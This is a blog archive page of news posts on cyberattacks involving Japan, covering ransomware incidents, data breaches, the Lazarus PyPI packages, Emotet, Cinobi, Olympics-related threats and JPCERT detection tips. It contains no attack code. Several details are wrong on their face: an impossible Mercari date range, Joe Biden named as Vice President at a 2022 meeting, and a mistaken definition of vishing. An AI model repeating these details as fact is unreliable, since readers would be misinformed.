Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Japan. Show all posts

CISA Urges Immediate Fix for Critical Array Networks Flaw

 


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding a critical security flaw in Array Networks AG and vxAG secure access gateways. The flaw, identified as CVE-2023-28461, has been under active exploitation by attackers. CISA has advised the federal agencies to install patches before December 16, 2024, in order to protect their systems. 


Understanding the Vulnerability

The flaw, rated with a critical severity score of 9.8, is caused by missing authentication in the software, enabling attackers to remotely execute harmful commands or access sensitive files without proper authorization. According to Array Networks, the vulnerability can be triggered by sending specific HTTP headers to vulnerable URLs.

A patch for this weakness was issued in March 2023 (version 9.4.0.484), but follow-up attacks indicate many systems have not been patched yet. Organizations using this application should update now to ensure the integrity of their network.


Who is attacking this flaw?

A cyber espionage group known as Earth Kasha, or MirrorFace, has been identified as actively exploiting this flaw. Tied to China, the group usually targets entities in Japan, but its activities have also been seen in Taiwan, India, and Europe.

In one attack, Earth Kasha used the weakness to spearhead a campaign of compromise against a European diplomatic body. The attackers were phishing emails referencing the future World Expo 2025 to be held in Japan that would lure victims to download a backdoor called ANEL. 


Vulnerability of Systems 

The cyber security firm VulnCheck stated that more than 440,000 devices with internet access may be prone to attack because of this type of vulnerability. Also, it was indicated in the report that in 2023 alone, 15 Chinese-linked hacking groups targeted at least one of the top 15 commonly exploited flaws. 


How Can Organizations Protect Themselves 

To minimize such threats, organizations must:

  1. Ensure all systems that implement Array Networks software are maintained on the latest patched version. 
  2. Reduce your exposure to sensitive devices on the internet whenever possible.
  3. Use robust patch management and monitoring systems to augment your defenses.
  4. Educate yourself through threat intelligence reports to understand emerging risks.


CISA Message to Agencies

Such direction has been given to agencies of the federal government for immediate action. By the utilization of these patches, they are capable of avoiding possible security breaches and further strengthening themselves against more complex cyber attacks. This reminder underscores a very critical point in proactive cybersecurity.


JPCERT Shares Tips for Detecting Ransomware Attacks Using Windows Event Logs

 

Japan’s Computer Emergency Response Center (JPCERT/CC) recently revealed strategies to detect ransomware attacks by analyzing Windows Event Logs, offering vital early detection before the attack spreads. JPCERT’s insights focus on identifying digital traces left behind by ransomware within four key types of event logs: Application, Security, System, and Setup logs. These logs reveal valuable clues about the entry points used by attackers and can assist in quicker mitigation. Ransomware attacks often target system vulnerabilities and attempt to encrypt files, delete backups, or modify network settings, leaving detectable traces within the event logs. 

For example, the notorious Conti ransomware can be recognized by multiple event logs connected to the Windows Restart Manager, showing event IDs 10000 and 10001. Other ransomware variants like Akira, Lockbit3.0, and HelloKitty, which share similar encryptor technology, leave comparable logs. Additionally, ransomware such as Phobos records when system backups are deleted, a key indicator of malicious activity. Detecting these logs promptly allows administrators to intervene before damage escalates. Midas ransomware, known for spreading infection via network changes, logs event ID 7040. Similarly, BadRabbit leaves event ID 7045 when installing its encryption component, while Bisamware logs events during the beginning and end of a Windows Installer transaction (event IDs 1040 and 1042). 

Other ransomware strains, like Shade, GandCrab, and Vice Society, create errors related to accessing COM applications and deleting Volume Shadow Copies, which are pivotal for restoring encrypted data. JPCERT’s findings illustrate that monitoring for these specific event IDs in combination with a broader security framework could be a game-changer in ransomware defense. Though older ransomware variants like WannaCry and Petya left no such traces in Windows logs, modern ransomware often does. As a result, tracking these logs offers an effective layer of protection against new threats, helping to prevent encryption and data loss. 

It is important to note that no single method of detection is foolproof. A multi-layered approach that combines monitoring event logs with other security tools and protocols remains crucial for protecting systems from ransomware attacks. By using this event log analysis strategy, organizations can significantly reduce the chances of ransomware spreading undetected, giving them the edge in stopping an attack before it cripples their network.

Kadokawa Group Hit by Major Ransomware Attack


 

Kadokawa Group, the parent company of renowned game developer FromSoftware, has fallen victim to a gruesome ransomware attack. The Japanese conglomerate, known for its diverse involvement in book publishing, the video-sharing service Niconico, and various other media enterprises, revealed the breach on Thursday. While the extent of the damage is still being assessed, the company is actively investigating potential information leaks and their impact on its business operations for the upcoming year.

The cyberattack, which occurred on Saturday, June 8, targeted the servers located in Kadokawa Group’s data centre. Niconico and its related services were the primary targets of this attack. Kadokawa Group stated that they are working on solutions and workarounds on a company-wide basis to restore normalcy to their systems and business activities. Despite the attack, Kadokawa assured that they do not store credit card information in their systems, which provides some relief regarding financial data security.

FromSoftware, the acclaimed studio behind hits like Dark Souls and Elden Ring, has not been specifically mentioned in Kadokawa’s disclosure about the affected businesses. This leaves some uncertainty about whether FromSoftware’s data and systems were compromised. However, Kadokawa’s broad approach to addressing the issue suggests a company-wide effort to mitigate any potential damage.

This incident is not an isolated one in the gaming industry. FromSoftware’s publishing partner, Bandai Namco, experienced a ransomware attack in 2022. Other prominent gaming companies, including Capcom, CD Projekt Red, and Insomniac Games, have also faced similar breaches. Notably, Rockstar Games suffered a major data breach in 2022, which resulted in the leak of an in-development build of Grand Theft Auto VI. In response, Rockstar took measures to enhance security, including limiting remote work.

Kadokawa Group is expected to provide further updates on the ransomware attack and the status of their systems in July. The company’s ongoing efforts to investigate and resolve the issue are crucial in determining the full impact of the breach.

While FromSoftware’s next project remains a mystery, fans eagerly anticipate the possibility of a Bloodborne sequel. Despite the current uncertainties surrounding the ransomware attack, the gaming community continues to look forward to future announcements from the esteemed game studio.

Kadokawa Group’s handling of this cyberattack will be closely watched as it unfolds, with implications for both their media operations and the wider industry’s approach to cybersecurity.


Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

 


Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, it remains essential for customers and stakeholders to remain careful and implement necessary precautions to mitigate potential risks. The company's efforts to enhance security measures and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.


Japan Blames Lazarus for PyPi Supply Chain Attack

 

Japanese cybersecurity officials issued a warning that North Korea's infamous Lazarus Group hacking group recently launched a supply chain attack on the PyPI software repository for Python apps. 

Threat actors disseminated contaminated packages with names like "pycryptoenv" and "pycryptoconf" that are comparable to the real "pycrypto" encryption tools for Python. Developers who are duped into installing the malicious packages onto their Windows workstations are infected with a severe Trojan called "Comebacker.” 

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded.” 

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to analyst and senior director at Gartner Dale Gardner. 

The trojan has been used in multiple attacks linked to North Korea, including one against a npm software development repository. 

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors.” 

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should use extra caution and care while downloading open source dependencies. Given the amount of open source used today and the pressures of fast-paced development environments, it's easy for even a well-trained and vigilant developer to make a mistake, Gardner added. 

Gardner recommends using software composition analysis (SCA) tools to evaluate dependencies and detect fakes or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages using package managers to minimise risk.

Ransomware Attack Forces Major Japanese Port to Halt its Operation

 

A ransomware attack was launched against Japan's biggest and busiest trading port by a cybercriminal outfit believed to be based in Russia. 

Following the incident, the Port of Nagoya paused all cargo operations, including the loading and unloading of containers onto trailers. The Port of Nagoya handles some vehicle exports for businesses like Toyota and represents 10% of Japan's total trade volume. Multiple Japanese media outlets were informed by the port authorities of Nagoya that it intended to quickly restore operations. 

The attack was attributed by the Nagoya Harbour Transportation Association to the LockBit ransomware group, which is thought to be the most active ransomware gang at the moment. According to the FBI and the U.S. Cybersecurity and Infrastructure Security Agency, LockBit was the cause of one out of every six ransomware incidents in 2022. The organisation has not made a formal admission of guilt for the Nagoya attack.

The five cargo terminals in the port's computer system were impacted by the event. According to the Japanese television network FNN, which cited the port's administration, some terminals are currently running manually without the system, but if it is not repaired, ship entry into the port may be banned.

Toyota told Japanese media that the cyber attack has made it impossible to load or unload auto parts, but that car manufacturing has not been affected.

The incident was discovered early on Tuesday, according to the port authority, when a port employee couldn't start a computer. According to reports, hackers remotely delivered an English-language ransom letter to a printer, demanding payment in exchange for the system's restoration. 

Series of attacks

This is not the port of Nagoya's first cyber attack; in September, a distributed denial-of-service (DDoS) attack by the Russian group Killnet temporarily took down the website of the port.

And the attack on the Port of Nagoya is only the most recent incident to have an impact on the shipping industry. A major ship software supplier was the target of a ransomware attack in January that affected around 1,000 vessels. In 2022, LockBit targeted the Port of Lisbon, and throughout the year, ports throughout Europe were the victim of several ransomware attacks. 

Alejandro Mayorkas, secretary of the U.S. Department of Homeland Security, stated to Congress in November that cyber attacks pose the greatest threat to U.S. ports.

Upgraded Security Deal Among Japan and Australia Against Chinese Cybercrimes

 


On Saturday, a new defense cooperation pact was signed between Japan and Australia to recognize the deteriorating security situation in the region as a consequence of China's growing assertiveness.

Fumio Kishida, the prime minister of Japan, praised the advancement of relations between the two countries after meeting with his Australian colleague Anthony Albanese in Perth, Western Australia. The two nations are committed to conducting cooperative military games and exchanging more sensitive intelligence.

It expands upon a reciprocal access pact that Kishida signed with Scott Morrison, Australia's prime minister at the time, in January, which lifts restrictions on conducting joint military drills in either nation.

It is the first time Japan has reached such a deal with a nation other than the US. Japan's Self-Defense Forces will train and participate in operations with the Australian defense in northern Australia for the first time as per the agreement, as revealed on Saturday.

According to Albanese, "this major proclamation sends a powerful signal to the area of our strategic alignment" in relation to that deal. In an "increasingly hostile strategic environment," according to Kishida, a new structure for collaboration in operations, intelligence, information, and logistical support was devised.

Since the Australian leader's administration was elected in May, Kishida has met with Albanese four times. This visit is for an annual bilateral summit. Two days after the election, they first met in Tokyo at the Quadrilateral Security Dialogue meeting, also known as the Quad, which also included U.S. Vice President Joe Biden and Indian Prime Minister Narendra Modi.

It was emblematic of the close economic links between the two countries that the meeting was decided to be held in Perth, the state capital of Western Australia, which supplies much of Japan's liquid natural gas and the wheat used to make udon noodles.

According to a website maintained by the Australian government, Australia has some of the world's top five resources for vital minerals such as antimony, cobalt, lithium, manganese ore, niobium, tungsten, and vanadium.

Australia is the world's top producer of lithium, rutile, zircon, and rare earth elements, as well as the second-largest producer overall.

Since 2007, when Australia and Japan signed their first military statement, China's defense expenditure has more than doubled. Japanese jets were called into action 22 times in 2006 to stop Chinese military aircraft from entering Japanese airspace. 722 times in response to Chinese aircraft last year, Japanese warplanes had to scramble.



Japanese City Worker Loses USB Containing Resident's Personal Data

 

A Japanese city has been compelled to apologise after a contractor admitted to losing a USB memory stick holding the personal data of over 500,000 inhabitants following an alcohol-fueled night out. 

Amagasaki, western Japan, officials claimed the man – an unidentified employee of a private contractor hired to administer Covid-19 compensation payments to local homes – had taken the flash drive from the city's offices to transfer the data to a contact centre in neighbouring Osaka. 

After spending Tuesday evening drinking at a restaurant, he realised on his way home that the bag holding the drive, as well as the personal information of all 460,000 Amagasaki residents, had gone missing. The next morning, he reported the loss to the police. 

According to the Asahi Shimbun, the information contained the residents' names, residences, and dates of birth, as well as data on their residence tax payments and the bank account numbers of those receiving child benefits and other welfare payments. There have been no complaints of data leaks because all of the information is encrypted and password secured. 

“We deeply regret that we have profoundly harmed the public’s trust in the administration of the city,” an Amagasaki official told reporters. The city told in a statement that it would “ensure security management when handling electronic data. We will work to regain our residents’ trust by heightening awareness of the importance of protecting personal information.” 

Not a new affair 

Last month, a man in Abu was handed £279,000/US$343,000 in Covid-19 relief payments meant for 463 low-income people. Local officials said this week that they had recovered all of the money via internet payment services after the individual claimed he had gambled it all away. 

The Amagasaki event highlights worries about some Japanese organisations' ongoing usage of obsolete technologies. According to media reports last week, dozens of businesses and government agencies were rushing to transition away from Internet Explorer before Microsoft retired the browser at midnight on Wednesday. 

According to Nikkei Asia, a sense of "panic" seized businesses and government organisations who were slow to abandon their dependency on IE before Microsoft formally ceased support services, leaving surviving users susceptible to flaws and hacks.

Phishing Emails Faking Voicemails aim to Steal Your Data

 

Vishing is the practice of sending phishing emails to victims that appear to be voicemail alerts to acquire their Microsoft 365 and Outlook login information. Researchers at Zscaler's ThreatLabz said this email campaign, which resembles phishing emails from a few years ago, was discovered in May and is still active. 

The researchers stated this month that the recent wave targets US organizations across various industries, including software security, security solution providers, the military, healthcare and pharmaceuticals, and the manufacturing and shipping supply chain. 

An email is where it all begins

Attackers inform recipients of missed voicemails via email notifications that contain links to web-based attachments. Although many people don't check voicemail, audio messages on LinkedIn and WhatsApp have been there for a while, so using them to deceive consumers into clicking a link in an email can be successful. 

Naturally, when the target clicks the link, they are taken to a credential phishing web page hosted on Japanese servers rather than a voicemail at all. The user gets directed to the Microsoft Office website or the Wikipedia page if the encoded email address at the end of the URL is missing.

The user is shown the final page, which is an Office 365 phishing page after they have correctly supplied the CAPTCHA information. The 2020 campaign Zscaler tracked using the same approach. 

"Since they can persuade the victims to open the email attachments, voicemail-themed phishing attacks continue to be an effective social engineering strategy for attackers. This, together with the use of evasion techniques to get around automatic URL inspection tools, aids the threat actor in acquiring the users' credentials more successfully "reports Zscaler ThreatLabz

Microsoft 365 Remains a Popular Victim 

In a 2022 Egress research titled "Fighting Phishing: The IT Leader's View," it was found that 40% of firms utilizing Microsoft 365 reported becoming victims of credential theft, and 85% of organizations using Microsoft 365 reported being victims of phishing in the previous 12 months. 

As the majority of businesses quickly transitioned to a primarily remote-work style, with many workers working from their homes, phishing usage continued to increase. It peaked during the peak of the COVID-19 pandemic in 2020 and 2021. 

A substantial majority of credentials have been successfully compromised by the effort, which can be utilized for a number of different cybercrime endgames. These consist of taking control of accounts to gain access to files and data theft to send malicious emails that appear to be from a legitimate organization, and implanting malware,. The goal is to trick victims into using the same passwords for several accounts by adding the user ID/password combinations to credential-stuffing lists. 

A rich mine of data that may be downloaded in bulk can usually be found in Microsoft 365 accounts, according to Robin Bell, CISO of Egress. Hackers may also use compromised Microsoft 365 accounts to send phishing emails to the victim's contacts in an effort to boost the success of their attacks.

Emotet Trojan Returns After a Dormant Period: Detected in Japan

 

Emotet Trojan is a highly advanced and sophisticated malware in today’s world. First detected in 2014, it is deemed as one of the most prevalent threats of the decade. After a dormant period,  Emotet Trojan's campaign was found attacking computers in Japan. It commonly functions as a downloader or dropper of other malware on PCs and other devices. 

Emotet got access to various organizations’ email boxes in Japan using phishing methods and around nine types of malware-laced files have been found attached to the emails, according to the reports. 

Emotet Trojan is also known as Heodo -- a Malware strain and a cybercrime operation that was originally designed in the form of a banking Trojan, to infiltrate foreign devices and spy on sensitive data. Due to its effective combination of persistence and network propagation, Emotet is infamous for being able to easily deceive basic antivirus programs as it hides from them. 

Once the system gets infected, the malware spreads like a computer worm and attempts to invade other devices in the network. It's worth noting that it is a very popular delivery mechanism for banking Trojans, such as Qakbot and TrickBot. As soon as the Trojan gets installed, it will either cipher the information on the victim’s computer or prevent the device from functioning appropriately. Moreover, these activities can lead to ransomware deployment or additional spam email campaigns. 

The reports on Emotet discovered that malware is spreading by installing malicious packages using the built-in feature of Windows 10 and even Windows 11. The feature is called installer, and this technique has already been reported in previous Trojan campaigns. 

In a recent report, CISA and MS-ISAC discovered that since august they have noticed a significant increase in malicious cyber operations targeting states and local governments with Emotet phishing emails, enlisting Emotet Trojan as one of the most prevalent ongoing cyber threats.

Japan mentioned Russia in its new cybersecurity strategy

The Japanese government on Tuesday officially approved a new three-year cybersecurity strategy, where Russia, China and North Korea are mentioned for the first time as potential sources of hacker attacks. The document is published on the website of the Cyber Strategic Headquarters of Japan.

Japanese Foreign Minister Toshimitsu Motegi said at a press conference in Tokyo that the sphere related to security guarantees is expanding. The importance of such areas such as cyberspace and space security is growing.

According to him, the security situation around Japan is becoming increasingly severe. It is believed that China, Russia and North Korea are strengthening their potential in cyberspace, and the instability of the world order is also increasing.

He added that Japan, based on the adopted strategy, will increase its capabilities to counter attacks by foreign hackers.

The document claims that China conducts cyber attacks in order to obtain military and other advanced technologies, and Russia allegedly to achieve beneficial military and political goals in other countries. According to the approved strategy, to strengthen the cyber potential, Japan intends to work closely with the participants of the Quadrilateral Security Dialogue, which also includes Australia, India and the United States.

It should be noted that in Japan, more than 4 thousand attempts of illegal penetration into various computer networks and systems are recorded annually. In particular, large electrical engineering corporations NEC and Mitsubishi Electric have become victims of intruders in recent years.

Western countries have repeatedly made allegations that Russia is involved in various cyber attacks, including against US government agencies and companies. The Russian side has consistently denied these accusations. In particular, the press secretary of the President of the Russian Federation Dmitry Peskov said earlier that Moscow is not involved in such hacker attacks.

Data From Fujitsu is Being Sold on the Dark Web

 

An organisation called Marketo is selling data from Fujitsu on the dark web, although the firm claims the information "appears to be tied to customers" rather than their own systems. Marketo announced on its leak site on August 26 that it had 4 GB of stolen data and was selling it. They claimed to have private customer information, company data, budget data, reports, and other company papers, including project information, and gave samples of the data.

Fujitsu Limited, based in Tokyo, is a Japanese multinational information and communications technology equipment and services firm founded in 1935. After IBM, Accenture, and AWS, Fujitsu was the world's fourth-largest IT services company by yearly sales in 2018. Fujitsu's hardware portfolio consists mostly of personal and enterprise computing solutions, such as x86, SPARC, and mainframe compatible servers. 

Initially, the group's leak site stated that there were 280 bids on the data, but now it only shows 70 offers. A Fujitsu representative downplayed the event, saying there was no evidence it was linked to a case in May in which hackers used Fujitsu's ProjectWEB platform to steal data from Japanese government agencies. 

"We are aware that information has been uploaded to dark web auction site 'Marketo' that purports to have been obtained from our site. Details of the source of this information, including whether it comes from our systems or environment, are unknown," a Fujitsu spokesperson said. 

Marketo is a reliable source, according to Ivan Righi, a cyber threat intelligence expert at Digital Shadows. The veracity of the material stolen, according to Righi, cannot be validated, but prior data leaks by the group have been found to be real. 

"Therefore, it is likely that the data exposed on their website is legitimate. At the time of writing, Marketo has only exposed a 24.5 MB 'evidence package,' which contained some data relating to another Japanese company called Toray Industries. The group also provided three screenshots of spreadsheets allegedly stolen in the attack," Righi said.

The group has gone as far as sending samples of stolen data to a company's competitors, clients, and partners in the past to embarrass victims into paying for their data back. The group has listed hundreds of firms on their leak site, most notably Puma, and releases one every week, usually selling data from US and European corporations. At least seven industrial goods and services firms, as well as healthcare and technology firms, have been targeted. 

According to Brett Callow, a ransomware expert, and threat analyst at Emsisoft, it's unknown how Marketo gets the data it offers, but there's evidence that the data is frequently linked to ransomware attacks.

Cinobi Banking Malware Targets Japanese Cryptocurrency Exchange Users via Malvertising Campaign

 

Researchers at Trend Micro discovered a new social engineering-based malvertising campaign targeting Japanese users with a malicious application disguised as a free porn game, a reward points application, or a video streaming app. 

The malicious application uses a sideloading methodology to show the victim arbitrary web pages and ultimately deploy the Cinobi banking trojan. Researchers say that the malvertising campaign shares much in common with the Cinobi banking trojan they identified last year, but consider it to be a rebranded version of it. The campaign’s configuration remained the same, except that it targets a list of cryptocurrency exchange websites in Japan.

Last year, researchers at Trend Micro unearthed a new banking trojan which was dubbed as Cinobi Banking Trojan. The banking malware was a part of a campaign called “Operation Overtrap”. The campaign was operated by a malicious group known as “Water Kappa”. The malicious group has deployed the trojan in two ways: either via spam or making use of the Bottle exploit kit that contained CVE-2020-1380 and CVE-2021-26411 (2 Internet Explorer exploits). Interestingly, only Internet Explorer users were targeted through these malvertising attacks. 

Throughout 2020 and the first half of 2021, researchers noticed limited activity from the malicious group, with traffic decreasing during the middle of June — possibly suggesting that the group was turning to new tools and techniques. Earlier this month, researchers discovered the banking malware targeting users in Japan by abusing sideloading bugs. Researchers at TrendMicro believe that the same attackers that engaged in the “Operation Overtrap” campaign are behind this new one.

The malvertising campaign targets users by sending malvertisements with five different themes. These malvertisements trick victims into installing the same archive with the malware files. After the victim clicks the download button (“index.clientdownload.windows”), the site downloads the ZIP archive for the main executable file.

Researchers noted that the malicious website can be accessed only via Japanese IP addresses and that malicious threat actors behind the malvertising campaign are trying to steal cryptocurrency as  Cryptocurrency accounts’ credentials are now what hackers want to obtain by deploying the banking trojan called Cinobi. 

Threat actors have designed few more versions of banking malware with slight differences. The most important is the configuration file responsible for the form-grabbing functionality. The banking trojan has been spotted targeting users of 11 Japanese financial institutions, including banks and cryptocurrency trading companies. To avoid getting infected, researchers advised users to be extra cautious of suspicious advertisements and install only legitimate applications from trusted sources.

Cyberattacks Zero in Tokyo Olympics as Games Begin

 

Malicious malware and websites have targeted both event organizers and regular spectators as the Tokyo Olympics' opening ceremony approaches. 

According to Tokyo-based Mitsui Bussan Secure Directions, this malware was published to the VirusTotal malware-scanning site on 20 July and has been identified by numerous antivirus software companies throughout the world. 

A fraudulent PDF file masquerades as a Japanese-language document on cyberattacks associated with the Olympics. When users open it, malware enters their computer and deletes the documents. The dubious PDF was allegedly sent to Japanese event officials by hackers in an effort to erase important Olympics-related data. 

Takashi Yoshikawa of MBSD cautioned concerning the "wiper" malware. The so-called Olympic Destroyer virus caused severe system interruptions at the 2018 Winter Games in Pyeongchang, South Korea. 

TXT, LOG, and CSV files, which can occasionally hold logs, databases, or password information, are targeted for deleting alongside Microsoft Office files. Furthermore, the wiper targets files generated using the Ichitaro Japanese word processor, leading the MBSD team to assume that the wiper was designed particularly for PCs in Japan, where the Ichitaro program is often installed. 

Yoshikawa added, "This is the type of attack we should be most concerned about for the Tokyo Olympics, and we need to continue keeping a close eye on this." 

Fraud streaming sites have also become a major source of concern for the Games, especially now that COVID-19 concerns have virtually prohibited viewers. The websites, which appeared when users searched for Olympic-related phrases on search engines like Google, require users to accept browser alerts so that malicious advertising can be shown. Numerous sites of this sort have previously been discovered by Trend Micro. 

In Japan, Olympic content is provided for free of cost on two official streaming service platforms: one operated by state broadcaster NHK, and the other named TVer, which is managed by commercial broadcasters. In the country, other streamers are not permitted. 

Trend Micro advises that clicking those links might expose the user to assault, advising viewers to watch the Olympics on officially recognized sites. Fake Olympics websites featuring important keywords like "Tokyo" or "2020" in their domain names are another concern. In a probable phishing attack, the login information of ticket purchasers and volunteers was also exposed online. Organizers are advising prudence in the wake of such dangers.

FujiFilm Shuts Down Network Following Ransomware Attack

 

Japanese multinational conglomerate FujiFilm, headquartered in Tokyo suffered a ransomware attack on Tuesday night. The company has shut down portions of its network to prevent the attack's spread, as a precautionary measure. 

"FUJIFILM Corporation is currently carrying out an investigation into possible unauthorized access to its server from outside of the company. As part of this investigation, the network is partially shut down and disconnected from external correspondence," the company said in a statement.

FujiFilm is renowned for its digital imaging products but also produces high-tech medical kits, including devices for the rapid processing of COVID-19 tests. Due to the partial network outage, FUJIFILM USA has added a notice to its website stating that it is currently experiencing network problems impacting its email and phone systems. 

“We want to state what we understand as of now and the measures that the company has taken. In the late evening of June 1, 2021, we became aware of the possibility of a ransomware attack. As a result, we have taken measures to suspend all affected systems in coordination with our various global entities. We are currently working to determine the extent and the scale of the issue. We sincerely apologize to our customers and business partners for the inconvenience this has caused,” FujiFilm further added. 

Threat hunting and cyber intelligence firm Group-IB estimated that the number of ransomware attacks grew by more than 150% in 2020 and that the average ransom demand increased more than twofold to $170,000.

While FUJIFILM has not stated what ransomware group is responsible for the attack, Advanced Intel CEO Vitali Kremez has told BleepingComputer that FUJIFILM was infected with the Qbot trojan last month.

"Based on our unique threat prevention platform Andariel, FUJIFILM Corporate appeared to be infected with Qbot malware based on May 15, 2021. Since the underground ransomware turmoil, the Qbot malware group currently works with the REvil ransomware group. A network infection attributed to QBot automatically results in risks associated with future ransomware attacks," Kremez told BleepingComputer.

Last week, hackers targeted the Japanese government organizations and gained access to the company's project management platform which resulted in data leaks from various government offices. One ministry had at least 76,000 email addresses exposed, including those belonging to individuals outside of the ministry.

Japanese E-Commerce Platform Mercari Suffers Major Data Breach

 

Mercari, an e-commerce platform, has disclosed a major data breach that occurred as a result of the Codecov supply-chain attack. Mercari is a publicly listed Japanese online marketplace that has recently expanded its operations to the United States and the United Kingdom. 

As of 2017, the Mercari app had been installed by over 100 million people around the globe, making the firm the first in Japan to achieve unicorn status. Codecov, a popular code coverage tool, was the victim of a two-month supply-chain attack. During these two months, the hackers modified the legal Codecov Bash Uploader tool to exfiltrate environment variables from Codecov customers’ CI/CD environments (which included sensitive information such as keys, tokens, and credentials). 

The popular code coverage tool Codecov was a victim of a supply-chain attack that lasted for two months. During this two-month period, the attackers have modified the legitimate Codecov Bash Uploader tool to exfiltrate environment variables (containing sensitive information such as keys, tokens, and credentials) from Codecov customers’ CI/CD environments. 

Using the credentials gathered from the tampered Bash Uploader, Codecov attackers managed to hack hundreds of customer networks. Now, the e-commerce giant Mercari has disclosed a major impact from the Codecov supply-chain attack on its customer data. The e-commerce platform has confirmed that the Codecov breach exposed tens of thousands of customer data, including financial details, to threat actors. 

According to Mercari, the following details have been compromised as a result of the investigation: 

• Between August 5, 2014, and January 20, 2014, there were 17,085 records related to the transfer of sales proceeds to customer accounts. The leaked data included bank code, branch code, account number, the account holder (kana), and the transfer amount. 

• For a select few, 7,966 records on ‘Mercari’ and ‘Merpay’ business associates were revealed, including names, dates of birth, affiliations, e-mail addresses, and more. 

• There are 2,615 documents on certain workers, including those who work for Mercari. Employee names, company email address, employee ID, phone number, date of birth, and other information as of April 2021. 

• Details of previous staff, vendors, and external company employees who dealt with Mercari 217 customer service support cases between November 2015 and January 2018. 

• Customer information exposed includes name, address, e-mail address, phone number, and inquiry material. 

• There are 6 records related to a May 2013 incident. Shortly after Codecov’s initial disclosure in mid-April, Mercari became aware of the consequences of the Codecov breach.

Mercari was also notified by GitHub on April 23rd of suspicious behavior linked to the incident seen on Mercari’s repositories. As Mercari found that a malicious third party had obtained and manipulated their authentication credentials, the company deactivated the compromised credentials and secrets immediately, while continuing to investigate the full scope of the breach.

"At the same time as this announcement, we will promptly provide individual information to those who are subject to the information leaked due to this matter, and we have also set up a dedicated contact point for inquiries regarding this matter," Mercari stated in its original press release.

"In the future, we will continue to implement further security enhancement measures and investigate this matter while utilizing the knowledge of external security experts, and will promptly report any new information that should be announced. We sincerely apologize for any inconvenience and concern caused by this matter," the company further added.

Tokyo Gas Discloses Data Breach Impacting Anime-style Dating Simulation Game

 

Recently a cyber attack has been reported by Tokyo Gas, the game’s developer and also known as a Japanese utility giant; the company said that around 10,000 email addresses belonging to players of an online animated style game were exposed during a data breach. 

Following the incident, the company has published a security alert post on January 30, whereby it stated that at present they have disabled the animated game's website  (popularly known as dating simulation game) and mobile app after it came to their notice that a third party has gained unauthorized control in the system and to the emails credentials and associated players’ nicknames. 

The translated name of the game is ‘Furo Koi: My Only Bath Butler’, the parent company of this application described it as a ‘romance game'. It is based on the Japanese role-playing genre, wherein users build relationships with the other users, mainly through conversations on the app. 

In response to the attack, the Japanese-language security alert has indicated that the game also appears as accessing the comparative effectiveness of various bathing products, whilst a video has been posted on the game’s Twitter account which shows various anime avatars. 

Tokyo Gas has been founded in 1885 in Japan and is Japan’s largest natural gas provider giant. According to the data about 10,365 emails credential has been exposed when the attack unfolded on January 29. 

In a press gathering, a spokesperson from the company said that the breach was discovered the following day, on January 30. However, currently, the company is not sure whether the stolen data has been misused or is safe. 

In the security alert, the company displayed a reference to the addition of a new feature to the game on January 28, but at present, it is unclear what, if any, connection this has to the data breach. 

It also indicated that all measures regarding the attack have been taken. Furthermore, law enforcement will be implementing security measures based on the findings of a security audit. 

The Tokyo Gas spokesperson said: “We recognize that the protection of customer information is extremely important. We sincerely apologize for any inconvenience caused to our customers”.

UK National Cyber Security Centre Reveals Russia’s Plan to Disrupt Tokyo Olympics

 

The UK National Cyber Security Centre recently revealed that in an attempt to completely disrupt the 'world's premier sporting event' the Russian military intelligence services were coming up with a cyber-attack on the Japanese-facilitated Olympics and Paralympics in Tokyo. 

The Russian cyber-reconnaissance work covered the Games organizers, logistics services, and sponsors and was in progress before the Olympics was delayed due to Covid-19. 

The proof is the first indication that Russia was set up to venture as far as to disrupt the summer Games, from which all Russian competitors had been prohibited on account of diligent state-sponsored doping offenses. 

The Kyodo news agency said a senior Japanese government official had specified that Tokyo would think about housing a protest with Moscow if cyber-attacks were affirmed to have been carried out by Russia. 

Japan's chief government spokesman, Katsunobu Kato, said the country would do all that is conceivable to guarantee that the postponed Games would be liberated from any and every cyber-attacks. 

